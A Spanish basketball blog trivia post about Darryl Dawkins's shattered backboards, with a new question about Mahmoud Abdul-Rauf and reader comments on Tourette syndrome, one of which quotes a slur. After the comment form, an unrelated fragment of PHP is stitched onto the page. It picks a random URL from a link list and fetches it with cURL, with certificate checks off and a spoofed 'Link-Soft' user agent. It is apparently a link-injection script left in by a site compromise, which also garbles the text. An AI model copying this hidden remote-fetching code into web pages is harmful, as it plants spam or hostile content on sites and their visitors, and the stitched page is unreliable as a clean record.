Trivial #18: Darryl Dawkins, el “destrozatableros”

23 de November de 2009 por txusma

El inicio de la temporada nos ha dejado casi sin tiempo para mantener el trivial pero no penséis que nos hemos olvidado de él. Quedan muchas preguntas en el tintero.

La del último día fue contestada, casi inmediatamente y de forma correcto por nuestro killer particular, Sergio. Efectivamente Darryl Dawkins era el jugador que buscábamos de forma un tanto ingenua. Las preguntas posteriores, evidentemente correctas, era para alargar un poco el tema.

Dawkins llegó a la liga directamente desde el instituto en 1975 y aunque en los primeros años no cumplió las expectativas generadas fue clave para que los Sixers alcanzaran la final al año siguiente, en las que se enfrentaron en a los Blazers de Bill Waton.

En noviembre de 1979, en un partido frente los Kansas City Kings destrozó un tablero que cayó en pequeños trozos encima de Bill Robinzine. 3 semanas más tarde volvió a hacerlo, esta vez en Philadelphia y la NBA decidió sancionar a los jugadores que rompieran tableros con multas y partidos de suspensión.

Venga, otra más:

Había una vez un pedazo de jugón (de libro), un combo guard, que se permitía el lujo de promediar casi 20 puntos y 7 asistencias por partido, o de pegarle bailes al mismísimo John Stockton e incluso a M. Jordan sufriendo una tremenda enfermedad neuronal que normalmente impide a los que la padecen realizar las actividades más cotidianas. ¿De quien estamos hablando y qué mal sufría?

Clasificación:

– Sergio: 9 puntos
– Rojorob: 2 puntos
– Kantonyo: 2 puntos
– Hector: 2 puntos
– Univerzee: 1 punto
– Daniel: 1 punto
– Daboal: 1 punto

Comenta

12 comentarios a esta entrada

  1. jonatan dice:
    #1

    Por ver si hay suerte ya que es noticia reciente
    Brian Grant jeej XD seguire buscando

      Citar

  2. sergio dice:
    #2

    Esta es bien chunga

      Citar

  3. HeiNeKeN dice:
    #3

    El unico caso que conozco es el de Rafer Alston que tenia síndrome de Asperger, pero no creo que sea el que buscais…

      Citar

  4. rojorob dice:
    #4

    Pues yo digo Tim Hardaway, aunque no sé qué enfermedad tiene (abstenerse del chiste fácil).

      Citar

  5. dsromero dice:
    #5

    Mahmoud Abdul-Rauf que tenía el síndrome de Touret

      Citar

  6. TheDeerHunter dice:
    #6

    premio para mr. romero

      Citar

  7. dsromero dice:
    #7

    la verdad es que mola llegar y que aún nadie haya dicho la respuesta [^_^]

      Citar

  8. Óscar dice:
    #8

    El síndrome de Touret lo tiene también el portero estadounidense del Everton, Tim Howard (ex del ManUtd). No sabía que pudiese ser tan maligno, de hecho este tío lleva a un gran nivel bastantes años en la Premier y es internacional. Lo que se le nota cuando le enfocan a veces es que tiene ” tics ” raros, movimientos extraños de cabeza y gestos raros con los ojos…
    ¿Es tan grave o degenerativa? ¿O es cuestión de grado y tratable?. Me’ quedao un poco asustao…

      Citar

  9. TheDeerHunter dice:
    #9

    Hablaremos de esto próximamente, Oscar… aunque creo que ninguno somos médicos

      Citar

  10. portu dice:
    #10

    Os puedo echar una mano… el Sindrome es muy variable, en mucha gente no tiene ningún tipo de alteración en la conducta ni déficit cognitivo, es decir, son totalmente normales en las relaciones personales y en el intelecto, sólo q destacan por sus “tics”, q en realidad no son esos tics q tiene mucha gente de guiñar un ojo, o subir una ceja o mover un poco el cuelllo, sino q suelen ser movimientos mucho más complejos, a veces auténticos “bailes” de brazos y cuello, casi una coreografía q repiten cada cierto tiempo. Evidentemente, si esto aparece cada media hora pues sí se convierte en muy limitante su día a día. Lo q tb suelen presentzr a menudo es la coprolalia, es decir, usan sin controlarlo palabrotas en medio de esos gestos o como único síntoma… hay pelis q han mostrado en plan cómico este tipo de comportamientos. En otros casos sí se asocian algunos trastornos leves o graves del comportamiento según el grado, como los tr. obsesivo-compulsivos, q son los más frecuentes en esta gente y ahí el tema se complica más, pero como siempre, todo según el grado de afectación. En cualquier caso la evolución no es a peor, suelen controlarse bien los síntomas con medicación y la mayoría de gente lleva una vida bastante normal, y evidentemente no es una enfermedad degenerativa ni maligna ni nada así. Hay otros casos graves q tienen una vida limitadísima pq son incapaces de salir de casa debido a sus obsesiones-compulsiones y a sus tics casi continuos.
    Conocí una vez un tío con el Sd, bueno lo veía todos los días pero no hablé con él, q sus manierismos o gestos consistían en levantar un brazo, doblarlo, tocarse la oreja haciendo un escorzo… todo eso durante unos 4 o 5 segundos mientras decía ahhhggggg … cabronazo maricoooooon, y luego el tío se quedaba tan tranquilo, como si nada hubiese pasado, y seguía haciendo lo q estuviese haciendo… no lo repetía mucho a lo largo del día, creo q menos de 1 vez cada hora, pero me contaron q tenía fases en q no lo podía controlar y no iba a currar. La primera vez q lo ves impacta un poco, inevitablemente es motivo de cachondeo, pero luego todos se acostumbran.

      Citar

  11. Óscar dice:
    #11

    Gracias, Portu. Y por cierto, se escribe Tourette, según he visto.

      Citar

  12. portu dice:
    #12

    De nada, el nombre completo es Sd. de Gilles de la Tourette.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>